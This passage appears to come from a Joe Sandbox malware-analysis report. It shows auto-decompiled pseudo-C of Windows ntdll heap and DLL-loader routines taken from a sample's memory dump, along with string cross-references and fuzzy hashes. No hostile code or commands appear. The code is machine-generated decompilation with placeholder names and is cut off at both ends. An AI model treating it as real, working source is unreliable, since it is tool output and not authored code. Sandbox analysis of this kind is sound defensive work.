                    					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                    					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                    						_t141 = 0;
                    					} else {
                    						_t141 = (_t256 - _t210 >> 0x10) + 1;
                    						_v40 = _t141;
                    						if(_t141 >= 0xfe) {
                    							_push(_t210);
                    							E0172A80D(_t236, _t256, _t210, 0);
                    							_t141 = _v40;
                    						}
                    					}
                    					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                    					 *((char*)(_t256 + 6)) = _t141;
                    					_t142 = _v12;
                    					 *_t256 = _t142;
                    					 *(_t256 + 3) = 0;
                    					_t211 = _t142 & 0x0000ffff;
                    					 *((char*)(_t256 + 7)) = 0;
                    					_v20 = _t211;
                    					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                    						_t119 = _t256 + 0x10; // -8
                    						E016BD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                    						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                    						_t211 = _v20;
                    					}
                    					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                    					if(_t252 == 0) {
                    						L56:
                    						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                    						_t146 = _t206 + 0xc0;
                    						goto L19;
                    					} else {
                    						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                    							L15:
                    							_t185 = _t211;
                    							goto L17;
                    						} else {
                    							while(1) {
                    								_t187 =  *_t252;
                    								if(_t187 == 0) {
                    									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                    									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                    									goto L17;
                    								}
                    								_t252 = _t187;
                    								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                    									continue;
                    								}
                    								goto L15;
                    							}
                    							while(1) {
                    								L17:
                    								_t212 = E0168AB40(_t206, _t252, 1, _t185, _t211);
                    								if(_t212 != 0) {
                    									_t146 = _t206 + 0xc0;
                    									break;
                    								}
                    								_t252 =  *_t252;
                    								_t211 = _v20;
                    								_t185 =  *(_t252 + 0x14);
                    							}
                    							L19:
                    							if(_t146 != _t212) {
                    								_t237 =  *(_t206 + 0x4c);
                    								_t253 = _v20;
                    								while(1) {
                    									__eflags = _t237;
                    									if(_t237 == 0) {
                    										_t147 =  *(_t212 - 8) & 0x0000ffff;
                    									} else {
                    										_t184 =  *(_t212 - 8);
                    										_t237 =  *(_t206 + 0x4c);
                    										__eflags = _t184 & _t237;
                    										if((_t184 & _t237) != 0) {
                    											_t184 = _t184 ^  *(_t206 + 0x50);
                    											__eflags = _t184;
                    										}
                    										_t147 = _t184 & 0x0000ffff;
                    									}
                    									__eflags = _t253 - (_t147 & 0x0000ffff);
                    									if(_t253 <= (_t147 & 0x0000ffff)) {
                    										goto L20;
                    									}
                    									_t212 =  *_t212;
                    									__eflags = _t206 + 0xc0 - _t212;
                    									if(_t206 + 0xc0 != _t212) {
                    										continue;
                    									} else {
                    										goto L20;
                    									}
                    									goto L56;
                    								}
                    							}
                    							L20:
                    							_t149 =  *((intOrPtr*)(_t212 + 4));
                    							_t33 = _t256 + 8; // -16
                    							_t238 = _t33;
                    							_t254 =  *_t149;
                    							if( *_t149 != _t212) {
                    								_push(_t212);
                    								E0172A80D(0, _t212, 0, _t254);
                    							} else {
                    								 *_t238 = _t212;
                    								 *((intOrPtr*)(_t238 + 4)) = _t149;
                    								 *_t149 = _t238;
                    								 *((intOrPtr*)(_t212 + 4)) = _t238;
                    							}
                    							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                    							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                    							if(_t255 == 0) {
                    								L36:
                    								if( *(_t206 + 0x4c) != 0) {
                    									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                    									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                    								}
                    								_t210 = _v48;
                    								_t251 = _v12 & 0x0000ffff;
                    								_t131 = _v20;
                    								_t235 = _v24 - _t131;
                    								_v24 = _t235;
                    								_t256 = _t256 + _t131 * 8;
                    								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                    									goto L41;
                    								} else {
                    									goto L39;
                    								}
                    							} else {
                    								_t216 =  *_t256 & 0x0000ffff;
                    								_v28 = _t216;
                    								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                    									L28:
                    									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                    									_v32 = _t242;
                    									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                    										_t167 = _t242 + _t242;
                    									} else {
                    										_t167 = _t242;
                    									}
                    									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                    									_t168 = _t167 << 2;
                    									_v40 = _t168;
                    									_t206 = _v44;
                    									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                    									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                    										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                    									}
                    									_t217 = _v16;
                    									if(_t217 != 0) {
                    										_t173 = _t217 - 8;
                    										_v52 = _t173;
                    										_t174 =  *_t173;
                    										__eflags =  *(_t206 + 0x4c);
                    										if( *(_t206 + 0x4c) != 0) {
                    											_t245 =  *(_t206 + 0x50) ^ _t174;
                    											_v36 = _t245;
                    											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                    											__eflags = _t245 >> 0x18 - _t225;
                    											if(_t245 >> 0x18 != _t225) {
                    												_push(_t225);
                    												E0172A80D(_t206, _v52, 0, 0);
                    											}
                    											_t174 = _v36;
                    											_t217 = _v16;
                    											_t242 = _v32;
                    										}
                    										_v28 = _v28 - (_t174 & 0x0000ffff);
                    										__eflags = _v28;
                    										if(_v28 > 0) {
                    											goto L34;
                    										} else {
                    											goto L33;
                    										}
                    									} else {
                    										L33:
                    										_t58 = _t256 + 8; // -16
                    										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                    										_t206 = _v44;
                    										_t217 = _v16;
                    										L34:
                    										if(_t217 == 0) {
                    											asm("bts eax, edx");
                    										}
                    										goto L36;
                    									}
                    								} else {
                    									goto L24;
                    								}
                    								while(1) {
                    									L24:
                    									_t182 =  *_t255;
                    									if(_t182 == 0) {
                    										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                    										__eflags = _t216;
                    										goto L28;
                    									}
                    									_t255 = _t182;
                    									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                    										continue;
                    									} else {
                    										goto L28;
                    									}
                    								}
                    								goto L28;
                    							}
                    						}
                    					}
                    					L39:
                    				} while (_t235 != 0);
                    				_t214 = _v12;
                    				_t131 =  *(_t206 + 0x54) ^ _t214;
                    				 *(_t256 + 4) = _t131;
                    				if(_t214 == 0) {
                    					__eflags =  *0x1758748 - 1;
                    					if( *0x1758748 >= 1) {
                    						_t127 = _t256 + 0xfff; // 0xfff
                    						_t131 = _t127 & 0xfffff000;
                    						__eflags = _t131 - _t256;
                    						if(_t131 != _t256) {
                    							_t156 =  *[fs:0x30];
                    							__eflags =  *(_t156 + 0xc);
                    							if( *(_t156 + 0xc) == 0) {
                    								_push("HEAP: ");
                    								E0166B150();
                    							} else {
                    								E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    							}
                    							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                    							_t131 = E0166B150();
                    							__eflags =  *0x1757bc8;
                    							if(__eflags == 0) {
                    								_t131 = E01722073(_t206, 1, _t251, __eflags);
                    							}
                    						}
                    					}
                    				}
                    				goto L41;
                    			}

                    Strings
                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 016D22F3
                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 016D2403
                    • HEAP: , xrefs: 016D22E6, 016D23F6
                    • HEAP[%wZ]: , xrefs: 016D22D7, 016D23E7
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                    • API String ID: 0-1657114761
                    • Opcode ID: dd7bea69936bfdf3b903b4bde363c6a9f04e299f3398fc896ad744e68663fd86
                    • Instruction ID: 876c9e2407fba654f4965ab6c47621d774b2a99002fe142b349383c3914531ba
                    • Opcode Fuzzy Hash: dd7bea69936bfdf3b903b4bde363c6a9f04e299f3398fc896ad744e68663fd86
                    • Instruction Fuzzy Hash: A7D1C074A042069FDB19DFA8C890BBAB7F2FF48300F15866EDD569B741E734A842CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E0168A229(void* __ecx, void* __edx) {
                    				signed int _v20;
                    				char _v24;
                    				char _v28;
                    				void* _v44;
                    				void* _v48;
                    				void* _v56;
                    				void* _v60;
                    				void* __ebx;
                    				signed int _t55;
                    				signed int _t57;
                    				void* _t61;
                    				intOrPtr _t62;
                    				void* _t65;
                    				void* _t71;
                    				signed char* _t74;
                    				intOrPtr _t75;
                    				signed char* _t80;
                    				intOrPtr _t81;
                    				void* _t82;
                    				signed char* _t85;
                    				signed char _t91;
                    				void* _t103;
                    				void* _t105;
                    				void* _t121;
                    				void* _t129;
                    				signed int _t131;
                    				void* _t133;
                    
                    				_t105 = __ecx;
                    				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                    				_t103 = __edx;
                    				_t129 = __ecx;
                    				E0168DF24(__edx,  &_v28, _t133);
                    				_t55 =  *(_t129 + 0x40) & 0x00040000;
                    				asm("sbb edi, edi");
                    				_t121 = ( ~_t55 & 0x0000003c) + 4;
                    				if(_t55 != 0) {
                    					_push(0);
                    					_push(0x14);
                    					_push( &_v24);
                    					_push(3);
                    					_push(_t129);
                    					_push(0xffffffff);
                    					_t57 = E016A9730();
                    					__eflags = _t57;
                    					if(_t57 < 0) {
                    						L17:
                    						_push(_t105);
                    						E0172A80D(_t129, 1, _v20, 0);
                    						_t121 = 4;
                    						goto L1;
                    					}
                    					__eflags = _v20 & 0x00000060;
                    					if((_v20 & 0x00000060) == 0) {
                    						goto L17;
                    					}
                    					__eflags = _v24 - _t129;
                    					if(_v24 == _t129) {
                    						goto L1;
                    					}
                    					goto L17;
                    				}
                    				L1:
                    				_push(_t121);
                    				_push(0x1000);
                    				_push(_t133 + 0x14);
                    				_push(0);
                    				_push(_t133 + 0x20);
                    				_push(0xffffffff);
                    				_t61 = E016A9660();
                    				_t122 = _t61;
                    				if(_t61 < 0) {
                    					_t62 =  *[fs:0x30];
                    					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                    					__eflags =  *(_t62 + 0xc);
                    					if( *(_t62 + 0xc) == 0) {
                    						_push("HEAP: ");
                    						E0166B150();
                    					} else {
                    						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					_push( *((intOrPtr*)(_t133 + 0xc)));
                    					_push( *((intOrPtr*)(_t133 + 0x14)));
                    					_push(_t129);
                    					E0166B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                    					_t65 = 0;
                    					L13:
                    					return _t65;
                    				}
                    				_t71 = E01687D50();
                    				_t124 = 0x7ffe0380;
                    				if(_t71 != 0) {
                    					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    				} else {
                    					_t74 = 0x7ffe0380;
                    				}
                    				if( *_t74 != 0) {
                    					_t75 =  *[fs:0x30];
                    					__eflags =  *(_t75 + 0x240) & 0x00000001;
                    					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                    						E0172138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                    					}
                    				}
                    				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                    				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                    				if(E01687D50() != 0) {
                    					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    				} else {
                    					_t80 = _t124;
                    				}
                    				if( *_t80 != 0) {
                    					_t81 =  *[fs:0x30];
                    					__eflags =  *(_t81 + 0x240) & 0x00000001;
                    					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                    						__eflags = E01687D50();
                    						if(__eflags != 0) {
                    							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    						}
                    						E01721582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                    					}
                    				}
                    				_t82 = E01687D50();
                    				_t125 = 0x7ffe038a;
                    				if(_t82 != 0) {
                    					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                    				} else {
                    					_t85 = 0x7ffe038a;
                    				}
                    				if( *_t85 != 0) {
                    					__eflags = E01687D50();
                    					if(__eflags != 0) {
                    						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                    						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                    					}
                    					E01721582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                    				}
                    				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                    				_t91 =  *(_t103 + 2);
                    				if((_t91 & 0x00000004) != 0) {
                    					E016BD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                    					_t91 =  *(_t103 + 2);
                    				}
                    				 *(_t103 + 2) = _t91 & 0x00000017;
                    				_t65 = 1;
                    				goto L13;
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                    • API String ID: 2994545307-2586055223
                    • Opcode ID: 6058ce4c67a8907ef968f41fe1e3d052815e53572882e8af38bdeea6cc3803f8
                    • Instruction ID: 74d1e69359a257b46d5e81bc3306386b75eadee12caa0e5e27dd4f1332a36dd1
                    • Opcode Fuzzy Hash: 6058ce4c67a8907ef968f41fe1e3d052815e53572882e8af38bdeea6cc3803f8
                    • Instruction Fuzzy Hash: 315112326046819FE322EBA8CC54F67BBE9FF81B10F180669F951CB392D764D941CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 44%
                    			E01698E00(void* __ecx) {
                    				signed int _v8;
                    				char _v12;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t32;
                    				intOrPtr _t35;
                    				intOrPtr _t43;
                    				void* _t46;
                    				intOrPtr _t47;
                    				void* _t48;
                    				signed int _t49;
                    				void* _t50;
                    				intOrPtr* _t51;
                    				signed int _t52;
                    				void* _t53;
                    				intOrPtr _t55;
                    
                    				_v8 =  *0x175d360 ^ _t52;
                    				_t49 = 0;
                    				_t48 = __ecx;
                    				_t55 =  *0x1758464; // 0x761c0110
                    				if(_t55 == 0) {
                    					L9:
                    					if( !_t49 >= 0) {
                    						if(( *0x1755780 & 0x00000003) != 0) {
                    							E016E5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                    						}
                    						if(( *0x1755780 & 0x00000010) != 0) {
                    							asm("int3");
                    						}
                    					}
                    					return E016AB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                    				}
                    				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                    				_t43 =  *0x1757984; // 0x1202b88
                    				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                    					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                    					if(_t48 == _t43) {
                    						_t50 = 0x5c;
                    						if( *_t32 == _t50) {
                    							_t46 = 0x3f;
                    							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                    								_t32 = _t32 + 8;
                    							}
                    						}
                    					}
                    					_t51 =  *0x1758464; // 0x761c0110
                    					 *0x175b1e0(_t47, _t32,  &_v12);
                    					_t49 =  *_t51();
                    					if(_t49 >= 0) {
                    						L8:
                    						_t35 = _v12;
                    						if(_t35 != 0) {
                    							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                    								E01699B10( *((intOrPtr*)(_t48 + 0x48)));
                    								_t35 = _v12;
                    							}
                    							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                    						}
                    						goto L9;
                    					}
                    					if(_t49 != 0xc000008a) {
                    						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                    							if(_t49 != 0xc00000bb) {
                    								goto L8;
                    							}
                    						}
                    					}
                    					if(( *0x1755780 & 0x00000005) != 0) {
                    						_push(_t49);
                    						E016E5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                    						_t53 = _t53 + 0x1c;
                    					}
                    					_t49 = 0;
                    					goto L8;
                    				} else {
                    					goto L9;
                    				}
                    			}

                    Strings
                    • LdrpFindDllActivationContext, xrefs: 016D9331, 016D935D
                    • minkernel\ntdll\ldrsnap.c, xrefs: 016D933B, 016D9367
                    • Querying the active activation context failed with status 0x%08lx, xrefs: 016D9357
                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 016D932A
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                    • API String ID: 0-3779518884
                    • Opcode ID: 7e73133a7915caa3df9c509ceef28605151f16d7ebe7fbf2767e25b2a4ef0595
                    • Instruction ID: de590c4c248d446e98fa85748372c8aa7feb1e6cc8a280bf10b238ee4df080f0
                    • Opcode Fuzzy Hash: 7e73133a7915caa3df9c509ceef28605151f16d7ebe7fbf2767e25b2a4ef0595
                    • Instruction Fuzzy Hash: 95411A32A0031D9FEF35AA1DCC68A757BBDBB43358F06856DE90557292E7B0AC8087C1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                    • API String ID: 2994545307-336120773
                    • Opcode ID: fe4bc961efd47d6cff61cba8b2b780daa050b42ca2c40c036857dc6674bc6ab8
                    • Instruction ID: 0c7eafb1059d8968b9598712080df68e66b18669d78f2d856d29c1a1a9ec7891
                    • Opcode Fuzzy Hash: fe4bc961efd47d6cff61cba8b2b780daa050b42ca2c40c036857dc6674bc6ab8
                    • Instruction Fuzzy Hash: 3F310172200160EFD320DB99CC89F6AF7B9EF05A25F1540A9F907CB241D670AA81CB6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E016899BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                    				char _v5;
                    				signed int _v12;
                    				signed int _v16;
                    				signed short _v20;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed short _t186;
                    				intOrPtr _t187;
                    				signed short _t190;
                    				signed int _t196;
                    				signed short _t197;
                    				intOrPtr _t203;
                    				signed int _t207;
                    				signed int _t210;
                    				signed short _t215;
                    				intOrPtr _t216;
                    				signed short _t219;
                    				signed int _t221;
                    				signed short _t222;
                    				intOrPtr _t228;
                    				signed int _t232;
                    				signed int _t235;
                    				signed int _t250;
                    				signed short _t251;
                    				intOrPtr _t252;
                    				signed short _t254;
                    				intOrPtr _t255;
                    				signed int _t258;
                    				signed int _t259;
                    				signed short _t262;
                    				intOrPtr _t271;
                    				signed int _t279;
                    				signed int _t282;
                    				signed int _t284;
                    				signed int _t286;
                    				intOrPtr _t292;
                    				signed int _t296;
                    				signed int _t299;
                    				signed int _t307;
                    				signed int* _t309;
                    				signed short* _t311;
                    				signed short* _t313;
                    				signed char _t314;
                    				intOrPtr _t316;
                    				signed int _t323;
                    				signed char _t328;
                    				signed short* _t330;
                    				signed char _t331;
                    				intOrPtr _t335;
                    				signed int _t342;
                    				signed char _t347;
                    				signed short* _t348;
                    				signed short* _t350;
                    				signed short _t352;
                    				signed char _t354;
                    				intOrPtr _t357;
                    				intOrPtr* _t364;
                    				signed char _t365;
                    				intOrPtr _t366;
                    				signed int _t373;
                    				signed char _t378;
                    				signed int* _t381;
                    				signed int _t382;
                    				signed short _t384;
                    				signed int _t386;
                    				unsigned int _t390;
                    				signed int _t393;
                    				signed int* _t394;
                    				unsigned int _t398;
                    				signed short _t400;
                    				signed short _t402;
                    				signed int _t404;
                    				signed int _t407;
                    				unsigned int _t411;
                    				signed short* _t414;
                    				signed int _t415;
                    				signed short* _t419;
                    				signed int* _t420;
                    				void* _t421;
                    
                    				_t414 = __edx;
                    				_t307 = __ecx;
                    				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
                    				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
                    					_v5 = _a8;
                    					L3:
                    					_t381 = _a4;
                    					goto L4;
                    				} else {
                    					__eflags =  *(__ecx + 0x4c);
                    					if( *(__ecx + 0x4c) != 0) {
                    						_t411 =  *(__ecx + 0x50) ^  *_t419;
                    						 *_t419 = _t411;
                    						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                    						__eflags = _t411 >> 0x18 - _t378;
                    						if(__eflags != 0) {
                    							_push(_t378);
                    							E0171FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                    						}
                    					}
                    					_t250 = _a8;
                    					_v5 = _t250;
                    					__eflags = _t250;
                    					if(_t250 != 0) {
                    						_t400 = _t414[6];
                    						_t53 =  &(_t414[4]); // -16
                    						_t348 = _t53;
                    						_t251 =  *_t348;
                    						_v12 = _t251;
                    						_v16 = _t400;
                    						_t252 =  *((intOrPtr*)(_t251 + 4));
                    						__eflags =  *_t400 - _t252;
                    						if( *_t400 != _t252) {
                    							L49:
                    							_push(_t348);
                    							_push( *_t400);
                    							E0172A80D(_t307, 0xd, _t348, _t252);
                    							L50:
                    							_v5 = 0;
                    							goto L11;
                    						}
                    						__eflags =  *_t400 - _t348;
                    						if( *_t400 != _t348) {
                    							goto L49;
                    						}
                    						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                    						_t407 =  *(_t307 + 0xb4);
                    						__eflags = _t407;
                    						if(_t407 == 0) {
                    							L36:
                    							_t364 = _v16;
                    							_t282 = _v12;
                    							 *_t364 = _t282;
                    							 *((intOrPtr*)(_t282 + 4)) = _t364;
                    							__eflags = _t414[1] & 0x00000008;
                    							if((_t414[1] & 0x00000008) == 0) {
                    								L39:
                    								_t365 = _t414[1];
                    								__eflags = _t365 & 0x00000004;
                    								if((_t365 & 0x00000004) != 0) {
                    									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                    									_v12 = _t284;
                    									__eflags = _t365 & 0x00000002;
                    									if((_t365 & 0x00000002) != 0) {
                    										__eflags = _t284 - 4;
                    										if(_t284 > 4) {
                    											_t284 = _t284 - 4;
                    											__eflags = _t284;
                    											_v12 = _t284;
                    										}
                    									}
                    									_t78 =  &(_t414[8]); // -8
                    									_t286 = E016BD540(_t78, _t284, 0xfeeefeee);
                    									_v16 = _t286;
                    									__eflags = _t286 - _v12;
                    									if(_t286 != _v12) {
                    										_t366 =  *[fs:0x30];
                    										__eflags =  *(_t366 + 0xc);
                    										if( *(_t366 + 0xc) == 0) {
                    											_push("HEAP: ");
                    											E0166B150();
                    										} else {
                    											E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    										}
                    										_push(_v16 + 0x10 + _t414);
                    										E0166B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                    										_t292 =  *[fs:0x30];
                    										_t421 = _t421 + 0xc;
                    										__eflags =  *((char*)(_t292 + 2));
                    										if( *((char*)(_t292 + 2)) != 0) {
                    											 *0x1756378 = 1;
                    											asm("int3");
                    											 *0x1756378 = 0;
                    										}
                    									}
                    								}
                    								goto L50;
                    							}
                    							_t296 = E0168A229(_t307, _t414);
                    							__eflags = _t296;
                    							if(_t296 != 0) {
                    								goto L39;
                    							} else {
                    								E0168A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                    								goto L50;
                    							}
                    						} else {
                    							_t373 =  *_t414 & 0x0000ffff;
                    							while(1) {
                    								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
                    								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                    									_t301 = _t373;
                    									break;
                    								}
                    								_t299 =  *_t407;
                    								__eflags = _t299;
                    								if(_t299 == 0) {
                    									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                    									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                    									break;
                    								} else {
                    									_t407 = _t299;
                    									continue;
                    								}
                    							}
                    							_t62 =  &(_t414[4]); // -16
                    							E0168BC04(_t307, _t407, 1, _t62, _t301, _t373);
                    							goto L36;
                    						}
                    					}
                    					L11:
                    					_t402 = _t419[6];
                    					_t25 =  &(_t419[4]); // -16
                    					_t350 = _t25;
                    					_t254 =  *_t350;
                    					_v12 = _t254;
                    					_v20 = _t402;
                    					_t255 =  *((intOrPtr*)(_t254 + 4));
                    					__eflags =  *_t402 - _t255;
                    					if( *_t402 != _t255) {
                    						L61:
                    						_push(_t350);
                    						_push( *_t402);
                    						E0172A80D(_t307, 0xd, _t350, _t255);
                    						goto L3;
                    					}
                    					__eflags =  *_t402 - _t350;
                    					if( *_t402 != _t350) {
                    						goto L61;
                    					}
                    					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                    					_t404 =  *(_t307 + 0xb4);
                    					__eflags = _t404;
                    					if(_t404 == 0) {
                    						L20:
                    						_t352 = _v20;
                    						_t258 = _v12;
                    						 *_t352 = _t258;
                    						 *(_t258 + 4) = _t352;
                    						__eflags = _t419[1] & 0x00000008;
                    						if((_t419[1] & 0x00000008) != 0) {
                    							_t259 = E0168A229(_t307, _t419);
                    							__eflags = _t259;
                    							if(_t259 != 0) {
                    								goto L21;
                    							} else {
                    								E0168A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                    								goto L3;
                    							}
                    						}
                    						L21:
                    						_t354 = _t419[1];
                    						__eflags = _t354 & 0x00000004;
                    						if((_t354 & 0x00000004) != 0) {
                    							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                    							__eflags = _t354 & 0x00000002;
                    							if((_t354 & 0x00000002) != 0) {
                    								__eflags = _t415 - 4;
                    								if(_t415 > 4) {
                    									_t415 = _t415 - 4;
                    									__eflags = _t415;
                    								}
                    							}
